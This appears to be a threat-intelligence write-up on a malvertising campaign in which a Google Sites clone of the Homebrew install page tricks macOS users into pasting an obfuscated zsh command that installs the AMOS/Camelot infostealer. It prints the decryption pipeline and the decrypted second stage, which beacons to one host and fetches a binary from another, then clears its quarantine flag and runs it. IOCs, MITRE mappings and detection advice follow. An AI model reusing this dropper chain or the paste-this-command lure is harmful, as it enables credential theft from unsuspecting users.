Homebrew ClickFix via Google Sites

Homebrew ClickFix via Google Sites

Analysis

8 MIN READ

TL;DR

A heavily obfuscated zsh script performs light hardware fingerprinting as camouflage, then decrypts an embedded AES-128-CTR + gzip payload. The decrypted second stage:

  1. Beacons to a C2/telemetry endpoint (atlas-compass.com)

  2. Downloads a binary from quest-22.com

  3. Clears quarantine attributes (xattr -c)

  4. Executes the binary from /tmp/helper

The downloaded binary is a Universal (x86_64 + arm64) Mach-O packed loader. It contains a small cleartext stub that uses dlsym for dynamic API resolution and a large high-entropy encrypted section. At runtime the stub decrypts the real payload.

VirusTotal confirms the family as AMOS (Atomic macOS Stealer) / Camelot (trojan.amos/camelot).[1]

The domain quest-22.com has been linked to recent malvertising campaigns distributing macOS infostealers via fake Homebrew installers. The current campaign uses a Google Sites landing page (sites.google.com/view/brewapp) that closely clones the official Homebrew install page and is promoted via Google Ads.[2][3][4]

Sandbox observations (VirusTotal): The sample (executed as ./update) exhibits additional stealth, C2, and defence-impairment techniques, contacts Apple CDNs and related infrastructure, performs extensive filesystem probing, and shows behavioural similarity to known MacOS Mirage / Zenbox samples.

Distribution / Infection Vector

The sample is distributed via a malvertising campaign that impersonates the official Homebrew package manager.


Landing Page

  • URL: https://sites.google.com/view/brewapp

  • Hosted on Google Sites (free Google hosting)

  • A visual replication of the legitimate Homebrew install page:

    • Dark background

    • Official-looking logo

    • Same layout, typography, and step-by-step instructions

    • Title: “Brew – The Missing Package Manager for macOS (or Linux)”

How the victim is infected

  1. User searches Google for “install homebrew”, “homebrew mac”, etc.

  2. A Google Ad appears at the top of the results. The ad often displays the legitimate domain brew.sh in the preview.

  3. Clicking the ad redirects the user to the Google Sites page (sites.google.com/view/brewapp).

  4. The page shows a code block containing an install command and instructs the user to:

    • Open the Terminal app

    • Copy the command

    • Paste it into Terminal and press Enter

  5. The command presented is the heavily obfuscated Layer 1 zsh script analysed in this report.

  6. Once executed, the script decrypts and runs the second-stage payload, which downloads and executes the AMOS/Camelot packed loader.

This is a classic ClickFix / social-engineering technique: the victim themselves pastes and runs the malicious command under the belief they are installing legitimate software.[3][5]

The same campaign has been observed using multiple Google Sites pages and rotating domains over time (e.g. earlier variants used brewe.sh, homabrews.org, etc.).[2][4][6]

Layer 1 – Outer Script Analysis

Decoy / Camouflage Behaviour

  • Collects and prints hardware information (sysctl hw.model, uname -m, memory in GB).

  • Checks for Rosetta (pgrep oahd) on x86_64.

  • Emits two log lines designed to look benign:

    • no action required

    • init complete

  • Declares many unused variables that mimic legitimate configuration (_format, _color, _indent, _log_level, _cohort, _track, _schema_id, etc.).

Payload Delivery Mechanism

# Key material
_kb=310                    # Calculated from string lengths + constants
_k=$(printf '%s' "$_kb" | md5)   # 06eb61b839a0cefee4967c67ccb099dc

# Ciphertext = concatenation of four hex strings:
# _build_tag + _cache_seed + _probe_salt + _vendor_ref

# Decryption pipeline
xxd -r -p | openssl enc -d -aes-128-ctr -K <md5> -iv 0000...0000 | gunzip

# Immediate execution
eval "${_r}"
# Key material
_kb=310                    # Calculated from string lengths + constants
_k=$(printf '%s' "$_kb" | md5)   # 06eb61b839a0cefee4967c67ccb099dc

# Ciphertext = concatenation of four hex strings:
# _build_tag + _cache_seed + _probe_salt + _vendor_ref

# Decryption pipeline
xxd -r -p | openssl enc -d -aes-128-ctr -K <md5> -iv 0000...0000 | gunzip

# Immediate execution
eval "${_r}"

Crypto details:

Property

Value

Algorithm

AES-128-CTR

Key

MD5(“310”) = 06eb61b839a0cefee4967c67ccb099dc

IV

16 null bytes

Post-processing

gunzip

Plaintext size

~1.2 KB (second-stage zsh)

Layer 2 – Decrypted Second-Stage Payload

#!/bin/zsh

# Beacon
curl -fsS -4 --connect-timeout 5 --max-time 10 \
  -X POST \
  -H 'user: AgI1VcX-lgKy6P7ZZ-nISDKtnwQxLcidQQVJOcUVUgGIX5VkNtPR' \
  -H 'BuildID: AgKpR1tzg4e4mfvVAFIF1ct8gvbT_Z-Ge2bG77lzxCr3TemD' \
  "hxxps://atlas-compass[.]com/api/metrics/run?event=pasted" \
  </dev/null >/dev/null 2>&1 &

# Download + execute
curl -o /tmp/helper \
  "hxxps://quest-22[.]com/2kqYRM0DCrnyJgoS4gVLl_FHJRRdTUhGCbjyuYwpZ6c/google/update" && \
  xattr -c /tmp/helper && \
  chmod

#!/bin/zsh

# Beacon
curl -fsS -4 --connect-timeout 5 --max-time 10 \
  -X POST \
  -H 'user: AgI1VcX-lgKy6P7ZZ-nISDKtnwQxLcidQQVJOcUVUgGIX5VkNtPR' \
  -H 'BuildID: AgKpR1tzg4e4mfvVAFIF1ct8gvbT_Z-Ge2bG77lzxCr3TemD' \
  "hxxps://atlas-compass[.]com/api/metrics/run?event=pasted" \
  </dev/null >/dev/null 2>&1 &

# Download + execute
curl -o /tmp/helper \
  "hxxps://quest-22[.]com/2kqYRM0DCrnyJgoS4gVLl_FHJRRdTUhGCbjyuYwpZ6c/google/update" && \
  xattr -c /tmp/helper && \
  chmod

Key Behaviours

Action

Purpose

Technique

Background POST to C2

Telemetry / “pasted” event reporting

Silent beacon

Download to /tmp/helper

Stage third-party binary

Remote file copy

xattr -c

Remove macOS quarantine flag

Defense evasion

chmod +x + execute

Run payload

Execution

Layer 3 – Universal Mach-O Packed Loader

The file downloaded to /tmp/helper is a Universal (Fat) Mach-O binary containing both x86_64 and arm64 slices.

File Hashes

Algorithm

Value

SHA-256

a4f602aeb066b5468eed4778d9cc8e1900a77fbb45b7aabcc3b700ce365c1521

SHA-1

5765fd17434b067ffe8c6b3ae207d89299bd3097

MD5

0422477b281213e738d70d95dad7ac54

Size

314,176 bytes

Structure



Notable Characteristics

  • Extremely sparse cleartext strings — almost no readable functionality indicators.

  • Unique identifier string present in both architectures:
    setup-c3d8a3275326e517e10e4e3289b32acbcb19a688
    (likely a build / campaign / sample ID).

  • Heavy use of dlsym for runtime API resolution (hides real imports from static analysis).

  • Other imported symbols: _getenv, _getsectiondata, _pthread_main_np, _strstr, _malloc, _free, _memcpy, _bzero.

  • __mod_init_func constructors present → code executes before main.

  • Large high-entropy data section (classic packed / encrypted payload).

  • Linked against only libSystem.B.dylib and libc++.1.dylib.

Runtime Behaviour (Inferred)

  1. Binary is launched.

  2. Constructor functions (__mod_init_func) run immediately.

  3. Stub resolves required APIs via dlsym.

  4. High-entropy section is decrypted (key derivation method not yet recovered statically).

  5. Decrypted content is the final information stealer (or an intermediate stage that loads it).

VirusTotal (Static)

Field

Value

Popular threat label

trojan.amos/camelot

Family labels

amos, camelot

First submission

2026-08-20 02:53:45 UTC

Signed

No

Identifier

setup-c3d8a3275326e517e10e4e3289b32acbcb19a688

Notable detections:

  • Kaspersky → HEUR:Trojan-PSW.OSX.Amos.bx

  • ESET-NOD32 → OSX/PSW.Agent.JL Trojan

  • Varist → MacOS/Agent.BL.gen!Camelot

  • Avast / AVG → MacOS:Agent-BQN [Trj]

  • Avira → TR/OSX.Agent.BQN

  • Fortinet → MAC/Agent.JL!tr

  • Elastic / Cynet / Google / WithSecure → Malicious

This confirms the packed loader belongs to the AMOS (Atomic macOS Stealer) family (Camelot variant).

VirusTotal Sandbox Behavioural Analysis

MITRE ATT&CK (Sandbox)

Tactic

ID

Techniques

Stealth

TA0005

Obfuscated Files or Information (T1027)
Masquerading (T1036)
Invalid Code Signature (T1036.001)

Command and Control

TA0011

Application Layer Protocol (T1071)
Encrypted Channel (T1573)

Defense Impairment

TA0112

Subvert Trust Controls (T1553)
Code Signing (T1553.002)

Network Communication

DNS Resolutions

  • e5977.dsce9.akamaiedge.net → 184.29.65.6

  • s.mzstatic.com → 17.253.7.150, 17.253.7.134

IP Traffic



JA3 Digests

  • ecdf4f49dd59effc439639da29186671

  • 773906b0efdefa24a7f2b8eb6985bf37

Behavior Similarity Hashes

  • VirusTotal MacOS Mirage: dab7dc919d9b081d95263f8a4aa36544

  • Zenbox macOS: c3477b607b8c49c79d9c5054cbb3eb50

File System Actions

Files Opened (high-signal)

  • /Users/admin

  • /Users/admin/.zshenv

  • /Users/admin/.zshrc

  • /Users/admin/Desktop

  • /Users/admin/Desktop/update

  • /Users/admin/Library/Input Methods

  • /Users/admin/Library/Keyboard Layouts

  • /bin/bash

  • /usr/bin/env

  • /usr/bin/login

  • /usr/libexec/path_helper

  • /private/etc/passwd

  • /private/etc/paths*

  • /opt/homebrew/...

  • Extensive Apple Unified Asset Framework / Siri / MLHost / ProtectedCloudStorage paths

Files Written

  • /Users/bruno/Library/Group Containers/group.com.apple.feedbacklogger/com.apple.siriknowledged/data.sqlite-shm

  • /Users/bruno/Library/Group Containers/group.com.apple.feedbacklogger/com.apple.siriknowledged/data.sqlite-wal

  • /Users/bruno/Library/UnifiedAssetFramework/UAFAssetSubscriptions.db

  • /Users/bruno/Library/UnifiedAssetFramework/UAFAssetSubscriptions.db-journal

  • /private/var/db/MobileIdentityService/Configuration/UserTrust.db-shm

Files Deleted

  • /Users/bruno/Library/UnifiedAssetFramework/UAFAssetSubscriptions.db-journal

Process and Service Actions

Processes Created

  • /Users/admin/Desktop/update

  • /bin/zsh

  • /usr/bin/env

  • /usr/libexec/path_helper

  • /Users/bruno/Desktop/update -

  • System daemons: bluetoothuserd, diagnosticspushd, mlhostd, online-auth-agent, siriknowledged

Shell Commands



Processes Terminated

  • /Users/admin/Desktop/update

  • /bin/bash

  • /usr/libexec/path_helper

Process Tree (excerpt)



Indicators of Compromise (IOCs)

Domains

  • atlas-compass.com — Beacon / telemetry endpoint

  • quest-22.com — Malware hosting (previously linked to fake Homebrew → infostealer campaigns)

  • sites.google.com — Hosting for the fake Homebrew landing page

  • e5977.dsce9.akamaiedge.net

  • s.mzstatic.com

URLs

  • https://sites.google.com/view/brewapp — Fake Homebrew install landing page (distribution)

  • https://atlas-compass.com/api/metrics/run?event=pasted

  • https://quest-22.com/2kqYRM0DCrnyJgoS4gVLl_FHJRRdTUhGCbjyuYwpZ6c/google/update

File Artefacts

  • /tmp/helper — Downloaded and executed Universal Mach-O loader

  • /Users/admin/Desktop/update / /Users/bruno/Desktop/update (sandbox execution names)

Mach-O Loader Hashes

Algorithm

Value

SHA-256

a4f602aeb066b5468eed4778d9cc8e1900a77fbb45b7aabcc3b700ce365c1521

SHA-1

5765fd17434b067ffe8c6b3ae207d89299bd3097

MD5

0422477b281213e738d70d95dad7ac54

Vhash

f4b7f1b55e8ad06b1675d53272ea6355

SSDEEP

6144:D3TzPu9MTSNSyZfWgCRmBXZ4HOuOrT2NSyZNWgCRGJxZ:DjzPu9MWUyZjCgBJAOrCUyZRCsJb

TLSH

T11064F164F52C6820E565D37C7E231E97524AFE324C38D76B5B0058A85C2AAF3DB13F92

CDHash

7206147bc37ea58af33100c308c87da63a133466

Thin Architecture Hashes (VirusTotal)

Arch

SHA-256

arm64

cab669a5aecce36de93cd20c01ed3387dc6480ef0bcfc57bcd24ef10cdcaf4e2

x86_64

e427448a6c85a164ebf52a2f1eb80b63ae2925fa47006c09516a2420d44ffa51

Unique String / Identifier (strong hunting indicator)

  • setup-c3d8a3275326e517e10e4e3289b32acbcb19a688
    (matches the Mach-O identifier field reported by VirusTotal)

Network / Headers

  • User-Agent style header: user: AgI1VcX-lgKy6P7ZZ-nISDKtnwQxLcidQQVJOcUVUgGIX5VkNtPR

  • BuildID header: AgKpR1tzg4e4mfvVAFIF1ct8gvbT_Z-Ge2bG77lzxCr3TemD

  • IPv4-only connections (-4 flag)

  • JA3: ecdf4f49dd59effc439639da29186671, 773906b0efdefa24a7f2b8eb6985bf37

Crypto Artifacts

  • AES-128-CTR key: 06eb61b839a0cefee4967c67ccb099dc

  • IV: all zeros

MITRE ATT&CK Mapping (macOS)

Tactic

Technique

ID

Notes

Initial Access

Drive-by Compromise / Malvertising

T1189

Google Ads → fake Homebrew Google Sites page (sites.google.com/view/brewapp)

Execution

Command and Scripting Interpreter

T1059.004

zsh

Defence Evasion

Obfuscated Files or Information

T1027

Multi-layer (hex + AES + gzip + eval)

Defence Evasion

Indicator Removal

T1070.004

xattr -c clears quarantine

Defence Evasion

Masquerading

T1036

Invalid / missing code signature

Defence Evasion

Invalid Code Signature

T1036.001

Unsigned Mach-O

Command and Control

Application Layer Protocol

T1071.001

HTTPS POST beacon

Command and Control

Encrypted Channel

T1573

Encrypted payload channel

Command and Control

Ingress Tool Transfer

T1105

curl download of second stage

Discovery

System Information Discovery

T1082

Hardware fingerprinting (decoy)

Defense Impairment

Subvert Trust Controls

T1553

Quarantine attribute removal

Defense Impairment

Code Signing

T1553.002

Invalid / missing signature

Detection Recommendations

YARA / Static

  • zsh scripts containing long hex strings + openssl enc -d -aes-128-ctr + gunzip + eval

  • Processes executing curl to quest-22.com or atlas-compass.com

  • Creation of /tmp/helper followed by xattr -c and immediate execution

  • Presence of the specific User / BuildID header values

  • Mach-O binaries containing the string setup-c3d8a3275326e517e10e4e3289b32acbcb19a688

  • Universal Mach-O with very few imports (dlsym, getenv, getsectiondata, pthread_main_np) + large high-entropy __const section + __mod_init_func

Behavioural

  • Background curl POST with short timeouts + custom headers

  • Immediate download → clear quarantine → execute pattern from temporary directory

  • Short-lived process that performs heavy dlsym activity shortly after launch

  • Connections matching the observed JA3 fingerprints and Apple/Akamai/Fastly IPs

Appendix – Key Derivation Confirmation



References:

  1. VirusTotal analysis of the Universal Mach-O sample (SHA-256: a4f602aeb066b5468eed4778d9cc8e1900a77fbb45b7aabcc3b700ce365c1521), first submitted 2026-08-20. Family label: trojan.amos/camelot.

  2. AdLock, “The Fake Homebrew Ad That Keeps Coming Back”, 21 May 2026. Documents ongoing use of Google Sites pages (e.g. sites.google.com/view/brewpage) for AMOS distribution via Google Ads.
    https://adlock.com/blog/fake-homebrew-ads/

  3. BleepingComputer, “Fake Homebrew Google ads target Mac users with malware”, 21 Jan 2025. Early documentation of the Google Ads → fake Homebrew → AMOS chain.
    https://www.bleepingcomputer.com/news/security/fake-homebrew-google-ads-target-mac-users-with-malware/

  4. Hunt.io, “Odyssey Stealer & AMOS Hit macOS Developers with Fake Homebrew Sites”, 16 Oct 2025. Detailed analysis of fake Homebrew / ClickFix distribution of AMOS.
    https://hunt.io/blog/macos-odyssey-amos-malware-campaign

  5. SANS Internet Storm Center, “Atomic MacOS (AMOS) stealer infection”, 2 Aug 2026. Documents near-identical second-stage patterns (/api/metrics/run?event=pasted and similar download paths).
    https://isc.sans.edu/diary/33208

  6. InfoStealers.com, “An Infostealer’s Brewin’: Cuckoo & AtomicStealer Get Creative”, 17 May 2024. Early analysis of fake Homebrew pages delivering AMOS.
    https://www.infostealers.com/article/an-infostealers-brewin-cuckoo-atomicstealer-get-creative/